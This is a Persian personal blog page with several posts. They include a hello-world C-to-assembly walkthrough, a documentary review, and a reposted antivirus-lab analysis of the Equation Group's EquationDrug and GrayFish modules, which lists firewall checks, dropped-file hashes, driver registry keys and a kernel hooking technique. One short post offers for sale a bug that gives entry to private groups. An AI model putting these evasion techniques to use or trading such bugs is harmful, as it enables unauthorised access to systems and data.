امسال برخلاف سال های قبل خیلی موقع سال تحویل جو نگرفتنون :| که مثلا یکی بغض میکرد یکی خودشو از پنجره پرت میکرد پایین !


سال نو شما بازدیدکنندگان ، خزنده ها ، بت ها ، اسپمرها مبارک

همتونو دوست دارم همتونو

  • ۰ نظر
  • ۰۱ فروردين ۹۴ ، ۰۲:۵۵
  • ۱۳۴ نمایش

سلام

با استفاده از این باگ شما میتونید به هر گروهی که اسمشو داشته باشید سر بزنید بدون اینکه دعوت شده باشید.ویدیو :

LINK VIDEO

این باگ به قیمت توافقی به فروش میرسد!

از اینجا تماس حاصل کنید :-D

  • ۱ نظر
  • ۲۱ اسفند ۹۳ ، ۱۲:۱۹
  • ۴۷۶ نمایش

Hello World

قصد دارم مثال معروفه hello world را که به زبان سی نوشته شده است را مورد تجزیه و تحلیل قرار بدم.کد ما به صورت زیر است :

#include <stdio.h>

int main()
{
printf("hello, world");
return 0;
}
من از خط فرمان کمپایلر VS2010 استفاده میکنم که "cl" نام دارد و با استفاده از آرگومان زیر به کد اسمبلی، کد بالا دسترسی پیدا کنیم:
cl 1.cpp /Fa1.asm
تکه کد اسمبلی تولید شده به این صورت است :
CONST SEGMENT
$SG3830 DB 'hello, world', 00H
CONST ENDS
PUBLIC _main
EXTRN _printf:PROC
; Function compile flags: /Odtp
_TEXT SEGMENT
_main PROC
push ebp
mov ebp, esp
push OFFSET $SG3830
call _printf
add esp, 4
xor eax, eax
pop ebp
ret 0
_main ENDP
_TEXT ENDS
پس از کمپایل، یک فایل با پسوند obj و همنام با فایل cpp ما ایجاد میشود که به فایل exe لینک داده شده است.

کد اسمبلی ما دارای دو قسمت (سگمنت) CONST (ثبات داده) و _TEXT (کد) است.

رشته ی "hello, world" در سی از نوع ثبات کاراکتر (const char*) تعریف شده است اما کمپایلر برای کار با این رشته یک نام داخلی ($SG3830) برای آن درنظر گرفته است.

همانطور که میدانید رشته ها در سی با نال بایت (%00) به اتمام میرسند و همانطور که میبینید در قسمت CONST انتهای رشته با 00H به پایان میرسد که همان نال بایت یا بایت صفرم است.

در قسمت کد (_TEXT)یک تابع به نام _main وجود دارد که در داخل تابع _main تابع دیگری به نام _printf صدا زده میشود اما قبل از صدا زدن تابع _printf آدرس رشته حاوی "hello, world" با کمک دستور push داخل stack قرار میگیرد، هنگامی که تابع _printf جریان کنترل را به تابع _main میسپارد آدرس رشته هنوز در پشته است چرا که ما دیگر نیازی به آن نداریم و محتویات رجیستر ESP به درستی مقدار دهی شده است .

"ADD ESP, 4" به معنی اضافه کردن 4 واحد به رجیستر ESP است حالا چرا 4 واحد ؟!

4 بایت برای سیستم های 32-بیت و 8 بایت برای سیستم های 64-بیت برای عبور از آدرس پشته نیاز است !

"ADD ESP, 4" معادل "POP register" است منتها بدون استفاده از رجیستر!

بعضی از کمپایلرها مانند Intel C++ Compiler به جای استفاده از "ADD" از "POP ECX" استفاده میکنند که فرقی در اجرای کد ندارد اما رجیستر ECX بازنویسی میشود

پس از اجرای تابع _printf در کد اصلی سی برنامه با دستور "return 0" که به معنی حاصل کار تابع است برنامه کار خودش را به پایان میرساند اما کد اسمبلی مربوط به این قسمت "XOR EAX, EAX" است که به معنی صفر کردن رجیستر EAX است دستورات دیگر هم میتوانند اینکار را انجام دهند مانند "MOV EAX, 0" یا "SUB EAX, EAX" سپس با رسیدن به کد "RET" عدد صفر را به سیستم عامل به عنوان صحت انجام موفق برنامه میدهد.

  • ۰ نظر
  • ۱۹ اسفند ۹۳ ، ۱۸:۲۷
  • ۱۶۷ نمایش

سلام

معرفی :

با انتشار خبر کشف بدافزار "معادله" ، کار تحلیل دقیق ماژول‌های این بدافزار توسط کارشناسان پادویش آغاز شد. با بررسی‌های اولیه‌ی صورت گرفته مشخص شد طراحی و پیاده‌سازی این بدافزار نیز، هم‌چون ‌موارد پیشرفته‌ی قبلی، ماژولار است. به طور کلی کدهای مربوط به بدافزار در قالب‌های متفاوتی از جمله فایل‌های اجرایی، درایور و پلاگین در سیستم اجرا می‌شود و تا کنون حدود پنج ماژول مختلف با نسخه‌های متفاوت کشف شده‌اند.

بررسی فایل‌های مرتبط با این بدافزار نشان می‌دهد که تاریخ پیاده‌سازی آن‌ها به اوایل سال 2008 میلادی باز‌می‌گردد. هرچند تاریخ موجود در فایل‌های بسیاری از بدافزار‌ها قابل اعتماد نیست، اما استفاده‌ی بدافزار از اکسپلویت معروفی که آسیب‌پذیری آن در نسخه‌های بعد از ویندوز xp برطرف شد به ما اطمینان می‌دهد که طراحی و پیاده‌سازی ماژول‌های بدافزار به زمانی قبل از به بازار آمدن نسخه‌های بعد از ویندوز xp باز‌می‌گردد.

در قدم اول، دو ماژول EquationDrug و GrayFish به عنوان راه اندازهای اصلی ماژول‌های مراحل بعدی تشخیص داده شده و هدف تحلیل قرار گرفتند. این دو ماژول نه تنها از لحاظ عملکردی مشابه‌اند بلکه ساختار کد آن‌ها نیز بسیار به یکدیگر نزدیک است. علاوه بر‌این استفاده از درایور و موتکسی با نام یکسان توسط این دو ماژول ارتباط نزدیک طراحان آن را تایید می‌کند. نکته‌ی جالب توجه این است که اکسپلویت ذکر شده نیز توسط هر دو ماژول با اندکی تفاوت به طور مشترک مورد استفاده قرارگرفته‌است! شاید ذکر این نکته جالب‌تر باشد که همین اکسپلویت در سال‌های بعد توسط بدافزار stuxnet نیز مورد استفاده قرار‌گرفت. به همین دلیل است که وجود ارتباط میان طراحان این دو بدافزار، stuxnet و Equation، دور از انتظار نیست. علاوه‌‌بر استفاده‌ی مشترک از این اکسپلویت، آن هم در زمانی قبل از انتشار این آسیب‌پذیری در سیستم عامل ویندوز، پی‌لود‌های اجرا شده نیز اهدافی بسیار مشابه دارند.

اگر‌چه در روز‌های اخیر انتشار خبر کشف این بدافزار کارشناسان زیادی را ترغیب به تحلیل این بدافزار کرده‌است، اما هنوز هیچ تحلیل دقیقی از این بدافزار منتشر نشده‌است. در ادامه بخش‌هایی از تحلیل دقیق این دو ماژول توسط کارشناسان ما ارایه می‌شود.

نحوه عملکرد :

1-  ماژول راه‌انداز EquationDrug

به طور خلاصه می‌توان گفت اجرای این ماژول در سیستم به عدم حضور برخی از دیواره‌های آتش وابسته‌است. در ادامه لیست دیواره‌های آتش مورد نظر بدافزار آمده‌است. این ماژول برای اطمینان از عدم وجود این دیواره‌های آتش از خواندن کلیه‌ی زیرکلید‌های مسیر رجیستری زیر استفاده می‌کند.

HKEY_LOCAL_MACHINE\Software


                                        نام زیر کلید

شماره

Zone Labs\TrueVector

1

Zone Labs\ZoneAlarm

2

KasperskyLab

3

Network Ice\BlackIce

4

Agnitum\Outpost Firewall

5

Sygate Technologies, Inc.\Sygate Personal Firewall

6

Norman

7

Data Fellows\F-Secure

8

PWI, Inc.

9

rising

10

Softwin

11

network associates\tvd\shared components\on access scanner\behaviourblocking

12

network associates\tvd\shared components\on access scanner\behaviourblocking

13

network associates\tvd\shared components\on access scanner\behaviourblocking

14

network associates\tvd\shared components\on access scanner\behaviourblocking

15

McAfee\ePolicy Orchestrator\Application Plugins\VIRUSCAN8600

16

Sophos

17

CA\CAPF

18

CA\HIPSEngine

19

Cisco

20

Symantec\IDS

21

Symantec\Norton 360

22

Symantec\Internet Security\SuiteOwnerGuid

23

Symantec\Norton AntiBot

24

Symantec\Symantec Endpoint Protection

25

Tiny Software\Tiny Firewall

26

CyberMedia Inc\Guard Dog

27

McAfee\Guard Dog

28

McAfee\McAfee Firewall

29

McAfee\Personal Firewall

30

McAfee.com\Personal Firewall

31

Network Associates\McAfee Fire

32

Kerio

33

BullGuard Ltd.\BullGuard

34

TheGreenBow

35

Panda Software\Firewall

36

TrendMicro\PC-cillin

37

ComputerAssociates\eTrust Suite Personal\pfw

38

Grisoft\Firewall

39

tware

40


در صورت وجود هر یک از دیواره‌های آتش، EquationDrug فایل خود را قبل از اولین راه‌اندازی مجدد از بین برده و در غیر این صورت، بررسی می‌کند که دسترسی‌های لازم برای ساختن فایل و بارگذاری درایور را دارد یا خیر. در صورتی که دسترسی پایین‌تری داشته باشد با استفاده از آسیب پذیری که در win32k.sys وجود دارد، با بهره‌گیری از Privilege escalation exploit دسترسی‌های لازم را به دست می‌آورد و سپس ماژول‌های مراحل بعدی را دراپ کرده و راه‌اندازی و اجرا می‌کند.

بعد از این عملیات و اجرای کلیه‌ی فایل‌های مورد نظر، در نهایت ماژول EquationDrug با دستور قبلی اقدام به از بین بردن فایل خود قبل از اولین راه‌اندازی مجدد می‌کند.

در جدول زیر اطلاعات مربوط به کلیه‌ فایل‌های دراپ‌شده توسط این ماژول آمده‌است.


سایز(byte)

MD5

نام

شماره

380928

4556CE5EB007AF1DE5BD3B457F0B216D

EquationDrug dropper

1

385024

60C21E45D6EE3B18205957D3E09E83ED

msnadt.exe

2

249856

5767B9D851D0C24E13ECA1BFD16EA424

MSCFG32.DLL

3

22016

C3AF66B9CE29EFE5EE34E87B6E136E3A

MSCFG32.EXE

4

9728

EF4405930E6071AE1F7F6FA7D4F3397D

unilay.dll

5

105120

C4F8671C1F00DAB30F5F88D684AF1927

MSNDSRV.SYS

6

512

C2AC3057054A19FB5A33B43125E3414A

mslog32.dat

7

77824

FD167CA95FC0A5242E20E6C50DA7475A

MSDIRECTX.EXE

8


نکته‌ای که باید به آن اشاره کرد این است که کلیه‌ی کدهای مربوط به ماژول‌های مراحل بعدی و اطلاعاتی هم‌چون نام دیواره‌های آتش، همگی با الگوریتمی یکسان رمز شده و در بخش منابع، resource، ماژول EquationDrug قرار‌گرفته‌اند. این کد‌ها و اطلاعات در مراحل مختلف لود شده، رمز‌گشایی می‌شوند و مورد‌استفاده‌ی بدافزار قرار ‌می‌گیرند. علاوه بر این، این ماژول موتکسی با نام prkMtx را در سیستم می‌سازد.

2-ماژول راه‌انداز GrayFish

 

به طور کلی این ماژول یکی از ماژول‌های راه انداز بدافزار است که نسبت به راه انداز دیگر گروه "معادله"، EquationDrug، از ساختاری پیشرفته‌تر برخوردار‌است. با توجه به این‌که زمان کامپایل این ماژول به اوایل سال 2008 میلادی بازمی‌گردد می‌توان گفت تکنیک‌های به‌کار‌رفته در آن در زمان خود بسیار پیشرفته بوده و حتی برخی از آن‌ها برای اولین بار استفاده شده‌اند.

 

تقریبا تمامی رشته‌های مهم از قبیل نام API‌ها و Event‌ها، فایل‌ها و ماژول‌های دیگر به صورت رمز‌شده نگه‌داری می‌شود. علاوه بر این به غیر از بخش انتهایی برنامه که بعد از انجام عملیات دراپ کردن و راه‌اندازی موفقیت‌آمیز درایورها فرا‌می‌رسد، کد سایر بخش‌ها غیر‌مبهم و تمیز است. در واقع در بخش ابتدایی برای دشوار‌شدن روال تحلیل، برنامه به‌جای استفاده از تکنیک‌های مبهم‌سازی و چندریختی، از تکنیک هوک بهره‌برده‌است. به طور دقیق‌تر می‌توان گفت برنامه‌نویس سعی‌کرده‌است برای جلوگیری از مشخص‌شدن روال کار، با استفاده از پیگیری APIهای استفاده شده، بخشی از کد یک درایور را در کرنل هوک کند. برای رسیدن به این هدف تابع IRP_MJ_DEVICE_CONTROL  مربوط به درایور Null.sys انتخاب و هوک می‌شود. این هوک با بهره گیری از یک اکسپلویت معروف پیاده‌­‍‌‌‌‌‌سازی شده­‌است که توسط بدافزار stuxnet نیز مورد استفاده قرار گرفته بود (آسیب پذیری که در win32k.sys وجود دارد، همانند ماژول قبلی). در این قسمت از توضیح دقیق روال کاری این اکسپلویت خودداری کرده­‌ایم. نکته‌­ی جالب توجه این است که علی رغم برطرف شدن این آسیب‌پذیری در ویندوزهای نسخه‌­های بالاتر، بدافزار هم‌چنان تلاش می‌کند از اکسپلویت مذکور استفاده کند.

 

بعد از هوک کردن این تابع، کلیه­‌ی فراخوانی‌­ها به جای فراخوانی مستقیم APIها از طریق فراخوانی این تابع صورت می­‌گیرد. برای مثال در زمان درخواست ساخت یک کلید رجیستری و یا نوشتن در آن، به جای استفاده از توابع معمول مثل RegCreateKey, RegSetValue به درایور Null.sys دستورات کنترلی ارسال می­‌شود. بنابراین می‌­توان گفت که کد فعال شده در این بخش هم‌چون یک API عمومی، GeneralAPI، عمل می‌کند. به این معنی که با توجه به کنترل کد و ورودی­‌های دریافتی تشخیص می‌­دهد که باید چه اقدامی در سیستم صورت دهد.

 

با توجه به توضیحات داده شده به طور خلاصه روال کار بدافزار در این بخش در سه مرحله انجام می‌­پذیرد.

 

مرحله­­‌ی اول: هوک کردن تابع ZwShutdownSystem

 

نتیجه: قرار گرفتن کد اولیه برای هوک کردن تابع IRP_MJ_DEVICE_CONTROL مربوط به درایور Null.sys

 

مرحله­‌ی دوم: فراخوانی تقلبی تابع ZwShutdownSystem و اجرای کد اولیه

 

نتیجه: قرار گرفتن کد ثانویه به عنوان API عمومی در تابع مربوطه

 

مرحله­‌ی سوم: فراخوانی متوالی API عمومی از طریق فراخوانی تقلبی تابع DeviceIoControl برای فایل با مسیر \\.\\NUL

 

نتیجه: انجام کلیه­‌ی فعالیت‌­های راه انداز از این طریق

 

لازم به ذکر است که بدافزار از API عمومی خود برای مقاصد زیر استفاده می­‌کند.

 

  •     عملیات خواندن و نوشتن کلیدهای رجیستری
  •     ساخت کلید رجیستری و پارامترهای آن
  •     خواندن و نوشتن در فایل
  •     ساخت فایل
  •     لود کردن درایورها در سیستم
  •     ساخت Thread

 

در شکل زیر می­‌توانید نمایی از ابتدای دومین پی­لود تابع را که به عنوان API عمومی عمل می­‌کند مشاهده کنید. فلش­‌های قرمز نمایشگر کدهای کنترلی‌ست که از سمت بخش کاربری به عنوان پارامتری کنترلی برای بخش کرنل ارسال شده و توسط بدافزار پشتیبانی می‌­شود.


بعد از آماده شدن API عمومی، نوبت به ایجاد فایل‌­های درایور بدافزار و لود کردن آن­ها می‌­رسد.  همان­طور که در شکل نمایش داده شده است سه درایور بدافزار به نام­‌های hrilib، msndsrv و ntevt در مسیر SYSTEM32 ایجاد شده و در مرحله­‌ی بعد راه‌­اندازی می‌­شوند. علاوه بر این برای هر یک از درایورها در مسیر رجیستری زیر کلیدی با پارامترهای مربوط ساخته شده و با مقادیری که در ادامه آمده است مقداردهی می‌­شود.

Key: HKLM\SYSTEM\CurrentControlSet\Services

SubKey: hrilib

DisplayName:  hrilib

ErrorControl: 0x00000001

ImagePath: "system32\Drivers\hrilib.sys"

Start: 0x00000002

Type: 0x00000001

Key: HKLM\SYSTEM\CurrentControlSet\Services\hrilib

SubKey: Enum

0: "Root\LEGACY_HRILIB\0000"

Count: 0x00000001

NextInstance: 0x00000001

SubKey: Parameters

Data: encrypted data

Key: HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_HRILIB

NextInstance: 0x00000001

SubKey: "0000"

Service: "hrilib"

Legacy: 0x00000001

ConfigFlags: 0x00000000

Class: "LegacyDriver"

ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"

DeviceDesc:  68 72 69 6C 69 62 08

SubKey: Control

*NewlyCreated*: 0x00000000

ActiveService: "hrilib"

* به جای نام hrilib در توضیحات رجیستری بالا می‌­تواند نام هر یک از درایورهای ساخته شده توسط راه‌انداز قرار گیرد.

توضیح این نکته ضروری به نظر می‌­رسد که استفاده از نوع LegacyDriver در ماژول‌­های درایور می­‌تواند به قدیمی بودن زمان طراحی و پیاده‌سازی این ماژول اشاره داشته باشد؛ چرا که این درایورها وابسته به طراحی legacy Windows NT بوده و از نوع Non-Plug and Play Drivers می‌­باشند.

در ادامه ماژول GrayFish از میان کلیدهای مربوط به سرویس­‌های درایوری در رجیستری دو کلید را به‌صورت تصادفی انتخاب کرده و پلاگین‌­های خود را که به فرمت رمز شده است به عنوان پارامتر در آن­ها ذخیره می­‌کند. به نظر می‌­رسد این پلاگین‌­ها در مراحل بعدی توسط سایر ماژول‌­ها مورد استفاده قرار گیرند.

یکی دیگر از موارد جالب دیده شده در روال این برنامه استفاده از تابع سند نشده‌ی RtlImageDirectoryEntryToData برای دریافت جدول Import ماژول ntkrnlpa است. با استفاده از این تابع سند نشده می‌توان اطلاعات متفاوتی را از یک فرمت PE لود شده در حافظه استخراج کرده و خواند.

در انتها نیز فایل INSTV4.BAT در مسیر زیر ساخته می­‌شود که حاوی دستور از بین بردن فایل اصلی برنامه است.

C:\Documents and Settings\***\Local Settings\Temp

بخش دیگر فایل ورژن سیستم عامل را با موارد زیر مقایسه می‌کند.

Service Pack 1
Service Pack 2, v.2055
Service Pack 2, v.2096
Service Pack 2, v.2149
Service Pack 2
Service Pack 3, v.3244

نتیجه­‌ی مقایسه‌­ی نسخه‌­ی سیستم در این مرحله تاثیری عملی بر روال کاری ماژول نخواهد داشت؛ اما این امکان وجود دارد که تغییرات ایجاد شده در پلاگین­‌ها وابسته به این موضوع باشد.


بخش انتهایی برنامه دارای کدهای مبهم است به گونه‌ای که سعی‌شده‌است به جای استفاده از فراخوانی‌ها و یا پرش‌های مشخص، آدرس بعدی اجرای کد در هر مرحله به روش‌های متفاوت ساخته‌شده و به وسیله‌ی فراخوانی‌های غیر مستقیم، رجیستری و یا دستور بازگشت ادامه‌ی برنامه اجرا شود. در شکل‌های بعدی بخش‌هایی از کد پایانی بدافزار را مشاهده می‌کنید.


سایز(byte)

MD5

نام

شماره

573,440

9B1CA66AAB784DC5F1DFE635D8F8A904

GrayFish dropper

1

6,400

8E13014032DF7CC9757F05742E56D9BE

hrilib.sys

2

45,920

C87E249A802CBB610F19E9D90AEE80E2

msndsrv.sys

3

91,136

DECB89B1C2A1354666FF398AE9D0D948

ntevt.sys

4




پاورقی ها :

1.Drop driver modules

2. Create/Write to registry key

3. Drop encrypted plugins

4. Create thread

لینک مطلب اصلی

  • ۰ نظر
  • ۱۱ اسفند ۹۳ ، ۱۲:۵۹
  • ۴۲۶ نمایش

میراث آلبرتا

۰۹
اسفند

میراث آلبرتا

سلام

دیشب این مستند رو دیدم واقعا هم تاسف باره هم اشتباه هم درسته هم دروغه هم راسته اصلا یه طوریه!

مستند اینطوریه که با اکثر نخبه ها و رتبه های برتر کنکور مصاحبه میکنن،داخل این مستند از هر 10 نفری که نشون میده 10 نفرشون قصد دارن برای ادامه ی تحصیل عازمه خارج از کشور بشن حالا یک سری مثل دکتر مشایخی یا دیگر استادانی که داخل این مستند هستند بعد از ادامه ی تحصیل و یا حتی تدریس در دانشگاه های مختلف خارج کشور آخرش به ایران برمیگردن و همه ی مشکلات روزمره ی داخل ایران و تحمل میکنن (یه جورای میسوزن و میسازن) چون وطن پرستن

اما واقعا کسایی که به درس علاقه دارن و یا نخبه هستند بلا استسنا میخوان از ایران برن !

اما قسمت جالبش برای من این بود که ساله n سه نقر تو خوابگاه دانشگاه شریف خودکشی کردن !

چرا واقعا ؟ :(

اما صحبت های خوبی هم میشه مثلا یک نمونه آقای مهدی نایبی استاد دانشکده ی برق شریف یه اشاره ای به مدگرایی و ارتباطش با ادامه ی تحصیل میکنه که واقعا جالبه و من هم کاملا موافقم.

در کل پیشنهاد میکنم ، این مستند رو ببینید

wiki

mirasealberta2.ir

  • ۰ نظر
  • ۰۹ اسفند ۹۳ ، ۱۶:۰۴
  • ۱۴۶ نمایش